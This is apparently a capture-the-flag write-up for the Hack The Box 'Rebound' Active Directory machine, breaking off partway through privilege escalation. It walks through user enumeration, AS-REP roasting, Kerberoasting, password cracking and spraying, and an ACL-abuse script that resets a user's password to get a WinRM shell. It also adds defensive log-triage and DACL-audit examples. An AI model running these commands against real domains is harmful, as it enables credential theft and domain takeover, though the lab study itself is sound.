Introduction

Rebound is an Insane Windows machine with a tricky Active Directory environment. User enumeration through "RID cycling" reveals an AS-REP-roastable user, whose TGT is used to Kerberoast another user with a crackable password. ACLs are abused to gain access to a group that has full control over an OU, perform a descendant object takeover (DOT), and then run a Shadow Credentials attack against a user with WinRM access. On the target system, a cross-session relay is used to obtain the NetNTLMv2 hash of the logged-on user; once cracked, it allows a gMSA password to be read. Finally, the gMSA account allows delegation, but without protocol transition. Resource-based constrained delegation (RBCD) is used to impersonate the domain controller, enabling a DCSync attack that leads to full privilege escalation.

Reconnaissance

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ sudo nmap -p- --min-rate 10000 10.10.11.231 -oN nmap/ports.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-11 10:58 EDT
Warning: 10.10.11.231 giving up on port because retransmission cap hit (10).
Nmap scan report for rebound.htb (10.10.11.231)
Host is up (0.096s latency).
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49673/tcp open unknown
49690/tcp open unknown
49691/tcp open unknown
49694/tcp open unknown
49707/tcp open unknown
49720/tcp open unknown
49741/tcp open unknown
49783/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 15.19 seconds

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ ports=$(cat nmap/ports.txt|grep open| awk -F "/" '{print $1}'|paste -sd ',')

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ sudo nmap -sT -sC -sV -O -p$ports 10.10.11.231 -oN nmap/details.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-11 10:59 EDT
Nmap scan report for rebound.htb (10.10.11.231)
Host is up (0.085s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-11 15:05:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2024-09-11T15:06:44+00:00; +5m45s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2024-09-11T15:06:44+00:00; +5m45s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-11T15:06:44+00:00; +5m45s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-11T15:06:44+00:00; +5m45s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49707/tcp open msrpc Microsoft Windows RPC
49720/tcp open msrpc Microsoft Windows RPC
49741/tcp open msrpc Microsoft Windows RPC
49783/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2019 (96%), Microsoft Windows 10 1709 - 1909 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows 10 1709 - 1803 (91%), Microsoft Windows 10 1809 - 2004 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-09-11T15:06:36
|_ start_date: N/A
|_clock-skew: mean: 5m44s, deviation: 0s, median: 5m44s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.44 seconds

Add the domain names to /etc/hosts:

sudo bash -c "echo '10.10.11.231 rebound.htb dc01.rebound.htb' >> /etc/hosts"

SMB

A null session can reach two shares:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ smbmap -H 10.10.11.231 -u null

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.11.231:445 Name: rebound.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Shared READ ONLY
SYSVOL NO ACCESS Logon server share

Both shares are empty:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ smbclient //10.10.11.231/IPC$ -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ smbclient //10.10.11.231/Shared -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 25 17:46:36 2023
.. D 0 Fri Aug 25 17:46:36 2023

4607743 blocks of size 4096. 1039160 blocks available
smb: \> exit

RPC

A null session can connect:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ rpcclient -U "" -N 10.10.11.231
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

The NT_STATUS_ACCESS_DENIED error means the server rejected the request for lack of privileges: the account used here does not have permission to enumerate domain users.

Enumerate users with a RID cycling attack instead:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ lookupsid.py -no-pass 'guest@rebound.htb' 20000
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra
[*] Brute forcing SIDs at rebound.htb
[*] StringBinding ncacn_np:rebound.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: rebound\Administrator (SidTypeUser)
501: rebound\Guest (SidTypeUser)
502: rebound\krbtgt (SidTypeUser)
512: rebound\Domain Admins (SidTypeGroup)
513: rebound\Domain Users (SidTypeGroup)
514: rebound\Domain Guests (SidTypeGroup)
515: rebound\Domain Computers (SidTypeGroup)
516: rebound\Domain Controllers (SidTypeGroup)
517: rebound\Cert Publishers (SidTypeAlias)
518: rebound\Schema Admins (SidTypeGroup)
519: rebound\Enterprise Admins (SidTypeGroup)
520: rebound\Group Policy Creator Owners (SidTypeGroup)
521: rebound\Read-only Domain Controllers (SidTypeGroup)
522: rebound\Cloneable Domain Controllers (SidTypeGroup)
525: rebound\Protected Users (SidTypeGroup)
526: rebound\Key Admins (SidTypeGroup)
527: rebound\Enterprise Key Admins (SidTypeGroup)
553: rebound\RAS and IAS Servers (SidTypeAlias)
571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
1000: rebound\DC01$ (SidTypeUser)
1101: rebound\DnsAdmins (SidTypeAlias)
1102: rebound\DnsUpdateProxy (SidTypeGroup)
1951: rebound\ppaul (SidTypeUser)
2952: rebound\llune (SidTypeUser)
3382: rebound\fflock (SidTypeUser)
5277: rebound\jjones (SidTypeUser)
5569: rebound\mmalone (SidTypeUser)
5680: rebound\nnoon (SidTypeUser)
7681: rebound\ldap_monitor (SidTypeUser)
7682: rebound\oorend (SidTypeUser)
7683: rebound\ServiceMgmt (SidTypeGroup)
7684: rebound\winrm_svc (SidTypeUser)
7685: rebound\batch_runner (SidTypeUser)
7686: rebound\tbrady (SidTypeUser)
7687: rebound\delegator$ (SidTypeUser)

Collect the usernames into a file:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ cat sid_result.txt|grep SidTypeUser|grep -oP 'rebound.\K.*(?=\()' > username.txt

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ cat username.txt
Administrator
Guest
krbtgt
DC01$
ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
winrm_svc
batch_runner
tbrady
delegator$

Foothold

AS-REP Roasting

Trying an AS-REP roasting attack: "Do not require Kerberos preauthentication" is set on the user jjones, and a TGT (the AS-REP) comes back for it:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ GetNPUsers.py -dc-ip 10.10.11.231 rebound.htb/ -usersfile username.txt
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User llune doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fflock doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$jjones@REBOUND.HTB:4c66ae7b7633af8f28c48084b200dedc$1bf2afd18bdfaf8b79bf4f257bc305fb42b25c8a4142ab2d10b8a3cd41cedf3b7064e45730f69c1b23ccf535e298b3694330fa395db591d75c3b3683fa2d797b2124ca8b97aad2ae6e52019f5cd7ef3dca64ac0ccb7a7a3a455bbde467c8a3c9cda41ca475ca43fa662e1ac73ef83adddbefda8a4c185092f8887ac87a53535eb3e4febfe1b4b1ecc2621219d2fad79d6cf842eb21929d47dee71f08d9a4f61649e7a052e08cfc878aea4208800bc98c44aac2e8cd6f914e63305f2e6a37922188e627c00a412c40e11c98d5ce6ecfc05b593150cc82e12b31b88153489e6782ca082da0127acd9c31fb
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User nnoon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ldap_monitor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User oorend doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User winrm_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User batch_runner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User delegator$ doesn't have UF_DONT_REQUIRE_PREAUTH set

However, neither john nor hashcat can crack the password:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ john jjones.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:09 DONE (2024-09-11 11:41) 0g/s 1477Kp/s 1477Kc/s 1477KC/s 0841079575..*7¡Vamos!
Session completed.

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ hashcat -m 18200 jjones.hash /usr/share/wordlists/rockyou.txt
[SNIP]

Kerberoast

With a user that does not require Kerberos pre-authentication in hand, we can try Kerberoasting without pre-authentication, requesting service tickets in that user's name:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ GetUserSPNs.py -no-preauth jjones -usersfile username.txt -dc-host 10.10.11.231 rebound.htb/
[SNIP]
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$ae249e49df17fddc5c790e16e8c3a3f4$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
[SNIP]

Service tickets came back for krbtgt, DC01$, delegator$ and ldap_monitor. Cracking the STs of krbtgt and DC01$ is not realistic, and delegator$ is obviously a machine account (if LAPS is configured for machine accounts, cracking is nearly hopeless as well); but ldap_monitor looks like an LDAP service account registered through the jjones user.

ldap_monitor's password cracks successfully:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ john ldap_monitor.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1GR8t@$$4u (?)
1g 0:00:00:05 DONE (2024-09-11 12:39) 0.1980g/s 2582Kp/s 2582Kc/s 2582KC/s 1Gobucs!..1DENA
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The credentials ldap_monitor:1GR8t@$$4u work over SMB but not over WinRM (presumably ldap_monitor is not in the Remote Management Users group), and enumerating SMB with them turns up nothing:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ crackmapexec smb 10.10.11.231 -u ldap_monitor -p '1GR8t@$$4u'
SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_monitor:1GR8t@$$4u

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ crackmapexec winrm 10.10.11.231 -u ldap_monitor -p '1GR8t@$$4u'
SMB 10.10.11.231 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:rebound.htb)
HTTP 10.10.11.231 5985 DC01 [*] http://10.10.11.231:5985/wsman
WINRM 10.10.11.231 5985 DC01 [-] rebound.htb\ldap_monitor:1GR8t@$$4u

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ crackmapexec smb 10.10.11.231 -u ldap_monitor -p '1GR8t@$$4u' --shares
SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_monitor:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] Enumerated shares
SMB 10.10.11.231 445 DC01 Share Permissions Remark
SMB 10.10.11.231 445 DC01 ----- ----------- ------
SMB 10.10.11.231 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.231 445 DC01 C$ Default share
SMB 10.10.11.231 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.231 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.231 445 DC01 Shared READ
SMB 10.10.11.231 445 DC01 SYSVOL READ Logon server share

Password Spray

Since 1GR8t@$$4u is a service account's password, we try a password spray. The password also works for the user oorend, but still gives no shell over WinRM, and SMB yields nothing either:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ crackmapexec smb 10.10.11.231 -u username.txt -p '1GR8t@$$4u' --continue-on-success
SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [-] rebound.htb\Administrator:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\krbtgt:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\DC01$:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\nnoon:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_monitor:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [+] rebound.htb\oorend:1GR8t@$$4u
SMB 10.10.11.231 445 DC01 [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\batch_runner:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.10.11.231 445 DC01 [-] rebound.htb\delegator$:1GR8t@$$4u STATUS_LOGON_FAILURE
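
Each of the three request patterns above (the AS-REP for jjones, RC4 service-ticket requests made in jjones's name, and one password tried against the whole user list) leaves a distinct trace in the domain controller's Security log. The following triage script is an added example, not part of the original write-up: it runs over a few constructed Security-log records (event IDs 4768, 4769 and 4625 flattened to key=value lines; the 10.10.14.5 source address is invented) and flags each pattern.

```python
from collections import defaultdict

# Constructed sample records (not taken from the box): Security-log events flattened to
# "EventID key=value ..." lines. 10.10.14.5 stands in for the attacking host.
SAMPLE_EVENTS = """\
4768 TargetUserName=jjones PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.5
4768 TargetUserName=ppaul PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.11.50
4769 TargetUserName=jjones@REBOUND.HTB ServiceName=ldap_monitor TicketEncryptionType=0x17 IpAddress=10.10.14.5
4769 TargetUserName=jjones@REBOUND.HTB ServiceName=DC01$ TicketEncryptionType=0x17 IpAddress=10.10.14.5
4769 TargetUserName=ppaul@REBOUND.HTB ServiceName=DC01$ TicketEncryptionType=0x12 IpAddress=10.10.11.50
4625 TargetUserName=Administrator IpAddress=10.10.14.5 Status=0xC000006D
4625 TargetUserName=ppaul IpAddress=10.10.14.5 Status=0xC000006D
4625 TargetUserName=llune IpAddress=10.10.14.5 Status=0xC000006D
4625 TargetUserName=fflock IpAddress=10.10.14.5 Status=0xC000006D
4625 TargetUserName=jjones IpAddress=10.10.14.5 Status=0xC000006D
4625 TargetUserName=ppaul IpAddress=10.10.11.50 Status=0xC000006D
"""

RC4_HMAC = "0x17"   # etype 23, the etype GetNPUsers.py / GetUserSPNs.py ask for by default


def parse_events(text):
    """Turn the flattened lines into dicts; the first token is the event ID."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event_id, *fields = line.split()
        rec = {"EventID": event_id}
        for field in fields:
            key, _, value = field.partition("=")
            rec[key] = value
        events.append(rec)
    return events


def asrep_roast_candidates(events):
    """4768 with Pre-Authentication Type 0: the TGT was issued without any pre-auth, which
    only happens for accounts with DONT_REQ_PREAUTH, so the AS-REP is crackable offline."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == "4768" and e.get("PreAuthType") == "0"})


def kerberoast_requests(events):
    """4769 with RC4 encryption for a user-account SPN. krbtgt and machine accounts ($)
    are skipped: their random passwords are not crackable, so they are noise here."""
    hits = []
    for e in events:
        if e["EventID"] != "4769" or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = e.get("ServiceName", "")
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        hits.append((e["TargetUserName"], svc))
    return hits


def password_spray_sources(events, threshold=5):
    """4625 failures against many *different* accounts from one source address."""
    accounts = defaultdict(set)
    for e in events:
        if e["EventID"] == "4625":
            accounts[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: len(users) for ip, users in accounts.items() if len(users) >= threshold}


if __name__ == "__main__":
    ev = parse_events(SAMPLE_EVENTS)
    print("AS-REP roast candidates:", asrep_roast_candidates(ev))
    print("RC4 TGS requests for user SPNs:", kerberoast_requests(ev))
    print("Spray sources:", password_spray_sources(ev))
```

A 4769 with etype 0x17 for a user SPN is exactly what GetUserSPNs.py produces, because it asks for RC4 explicitly, and a spray shows up as many distinct TargetUserName values from one source in a short window. The fixes are on the account side: clear DONT_REQ_PREAUTH, give service accounts AES-only keys and long passwords (or make them gMSAs), and alert on the spray threshold.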

ACL Abuse

Collect domain information with BloodHound:

sudo ntpdate -s rebound.htb 
bloodhound-python -u ldap_monitor -p '1GR8t@$$4u' -d rebound.htb -dc dc01.rebound.htb --zip -c Group,LocalAdmin,RDP,DCOM,Container,PSRemote,Session,Acl,Trusts,LoggedOn -ns 10.10.11.231

oorend has the "Self" right on the ServiceMGMT group, which means oorend can add itself to ServiceMGMT;

The ServiceMGMT group has GenericAll on the "Service Users" OU, which means I can change or add ACLs on the "Service Users" OU;

winrm_svc sits in the "Service Users" OU, which means I can give oorend full control over "Service Users", after which oorend can change the password of winrm_svc;

The script:

#!/bin/bash

dcip=10.10.11.231

sudo ntpdate -s $dcip

echo "Getting oorend ticket"
impacket-getTGT rebound.htb/oorend:'1GR8t@$$4u'

export KRB5CCNAME=oorend.ccache

echo "Adding oorend to servicemgmt group"
bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add groupMember ServiceMGMT oorend

echo "Writing dacl"
bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend

echo "Changing winrm_svc password"
bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set password winrm_svc 'LeetPassword123!'
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ bash poc.sh
Getting oorend ticket
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Saving ticket in oorend.ccache
Adding oorend to servicemgmt group
[+] oorend added to ServiceMGMT
Writing dacl
[+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB
Changing winrm_svc password
[+] Password changed successfully!
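
The three BloodHound findings above are all entries in DACLs, and a defender can find the same chain by reading the security descriptors directly. The following is an added example, not part of the original write-up: an audit over two constructed SDDL strings (they model what BloodHound reported, using the domain SID and RIDs from the lookupsid.py output above, but were not exported from the box) that reports control rights held by principals outside the expected admin set, notes when an ACE is inheritable (the descendant-object-takeover case), and ties a "Self" right on a group to an inheritable right that group holds on an OU.

```python
import re

# Constructed SDDL strings (not exported from the box) standing in for the DACLs BloodHound
# showed. Domain SID and RIDs are the ones lookupsid.py printed.
DOMAIN_SID = "S-1-5-21-4078382237-1492182817-2568127209"
SERVICEMGMT_SID = f"{DOMAIN_SID}-7683"
OOREND_SID = f"{DOMAIN_SID}-7682"
MEMBER_ATTR_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"   # schemaIDGUID of 'member'

# OU=Service Users: ServiceMGMT holds GenericAll with CI (container inherit), so every
# object under the OU, winrm_svc included, inherits the ACE.
OU_SDDL = (f"D:AI(A;CI;GA;;;{SERVICEMGMT_SID})(A;;RPLCLORC;;;AU)"
           f"(A;CIID;GA;;;DA)(A;CIID;GA;;;SY)")
# CN=ServiceMGMT: oorend holds SW (validated write, BloodHound's 'Self') on 'member'.
GROUP_SDDL = (f"D:AI(OA;;SW;{MEMBER_ATTR_GUID};;{OOREND_SID})(A;;RPLCLORC;;;AU)"
              f"(A;CIID;GA;;;DA)")

ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")
# Rights that give control of an object. AD often spells GenericAll out as the long
# CCDCLCSWRPWPDTLOCRSDRCWDWO string; WP/WD/WO in that string are caught here as well.
CONTROL_RIGHTS = {"GA": "GenericAll", "GW": "GenericWrite", "WD": "WriteDacl",
                  "WO": "WriteOwner", "WP": "WriteProperty", "SW": "Self"}
# SDDL aliases of principals expected to hold control rights everywhere
TRUSTED_TRUSTEES = {"DA", "EA", "BA", "SY", "CO", "DD", "ED"}


def _pairs(s):
    """SDDL rights and flags are concatenated two-letter tokens."""
    return [s[i:i + 2] for i in range(0, len(s), 2)]


def audit_sddl(object_dn, sddl, trusted=TRUSTED_TRUSTEES):
    """Allow-ACEs on one object that grant a control right to an unexpected trustee."""
    findings = []
    for ace_type, flags, rights, obj_guid, _inherit_guid, trustee in ACE_RE.findall(sddl):
        if ace_type not in ("A", "OA") or trustee in trusted:
            continue
        granted = [CONTROL_RIGHTS[r] for r in _pairs(rights) if r in CONTROL_RIGHTS]
        if not granted:
            continue
        flag_set = set(_pairs(flags))
        finding = {
            "object": object_dn,
            "trustee": trustee,
            "rights": granted,
            "attribute": obj_guid or "*",          # empty object GUID = the whole object
            "inherits_to_children": "CI" in flag_set,
            "inherited": "ID" in flag_set,
        }
        if "Self" in granted and obj_guid == MEMBER_ATTR_GUID:
            finding["note"] = "trustee can add itself to this group"
        elif finding["inherits_to_children"] and finding["attribute"] == "*":
            finding["note"] = "descendant objects inherit this control right"
        findings.append(finding)
    return findings


def descendant_takeover_paths(group_sid, group_findings, ou_findings):
    """Join the two audits the way BloodHound did: a trustee that can add itself to the
    group, where the group holds an inheritable control right on an OU, controls every
    object under that OU."""
    joiners = [f["trustee"] for f in group_findings
               if f.get("note") == "trustee can add itself to this group"]
    paths = []
    for f in ou_findings:
        if f["trustee"] == group_sid and f["inherits_to_children"]:
            paths += [(j, group_sid, f["object"]) for j in joiners]
    return paths


if __name__ == "__main__":
    ou = audit_sddl("OU=Service Users,DC=rebound,DC=htb", OU_SDDL)
    grp = audit_sddl("CN=ServiceMGMT,CN=Users,DC=rebound,DC=htb", GROUP_SDDL)
    for f in ou + grp:
        print(f)
    print(descendant_takeover_paths(SERVICEMGMT_SID, grp, ou))
```

On a real domain the SDDL comes from the nTSecurityDescriptor attribute, for example `(Get-Acl "AD:\OU=Service Users,DC=rebound,DC=htb").Sddl` in PowerShell. The inheritable GenericAll is the setting to remove: a group that has to manage service accounts can be granted a reset-password right on the specific objects instead of full control over the container.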

After changing winrm_svc's password, I can connect over WinRM with "LeetPassword123!", because winrm_svc is a member of the Remote Management Users group, as BloodHound shows:

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ evil-winrm -i 10.10.11.231 -u winrm_svc -p 'LeetPassword123!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
rebound\winrm_svc

Privilege Escalation

Cross-session

Even with winrm_svc taken, the CanPSRemote edge to the domain controller still cannot be abused any further, because that technique requires credentials, as the CanPSRemote description explains.

The running processes are interesting: there is a bunch of processes in session 1. Usually on HTB machines, when nobody is logged in, I see LogonUI and a few other processes, but here explorer is running, and it looks like someone is actually logged in.

*Evil-WinRM* PS C:\Users\winrm_svc\Documents> get-process

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
395 33 12696 21332 2828 0 certsrv
480 19 2244 5492 392 0 csrss
274 16 2228 5300 504 1 csrss
357 15 3476 15000 5868 1 ctfmon
401 33 16376 25236 2928 0 dfsrs
189 13 2388 8204 1836 0 dfssvc
290 14 3848 13808 3876 0 dllhost
5374 4793 69020 71240 2968 0 dns
601 25 24480 52216 60 1 dwm
1505 59 25076 89616 5312 1 explorer
53 6 1788 5444 2804 1 fontdrvhost
53 6 1504 4728 2812 0 fontdrvhost
0 0 56 8 0 0 Idle
142 14 2224 6096 2984 0 ismserv
